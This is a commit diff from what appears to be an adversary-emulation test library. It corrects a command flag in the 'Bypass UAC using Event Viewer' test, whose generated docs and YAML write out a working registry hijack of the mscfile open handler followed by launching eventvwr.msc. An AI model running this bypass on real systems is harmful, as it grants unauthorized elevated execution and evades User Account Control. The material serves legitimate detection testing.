Generate docs from job=validate_atomics_generate_docs branch=master
This commit is contained in:
parent
6b6f4beae5
commit
37ca7e5fd0
@@ -37,7 +37,7 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry
|
||||
#### Run it with `command_prompt`!
|
||||
```
|
||||
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
|
||||
cmd.exe -c eventvwr.msc
|
||||
cmd.exe /c eventvwr.msc
|
||||
```
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
+2
-2
@@ -4209,7 +4209,7 @@ defense-evasion:
|
||||
name: command_prompt
|
||||
command: |
|
||||
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
|
||||
cmd.exe -c eventvwr.msc
|
||||
cmd.exe /c eventvwr.msc
|
||||
- name: Bypass UAC using Event Viewer - PowerShell
|
||||
description: 'PowerShell code to bypass User Account Control using Event Viewer
|
||||
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
|
||||
@@ -9592,7 +9592,7 @@ privilege-escalation:
|
||||
name: command_prompt
|
||||
command: |
|
||||
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
|
||||
cmd.exe -c eventvwr.msc
|
||||
cmd.exe /c eventvwr.msc
|
||||
- name: Bypass UAC using Event Viewer - PowerShell
|
||||
description: 'PowerShell code to bypass User Account Control using Event Viewer
|
||||
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
|
||||
|
||||
Reference in New Issue
Block a user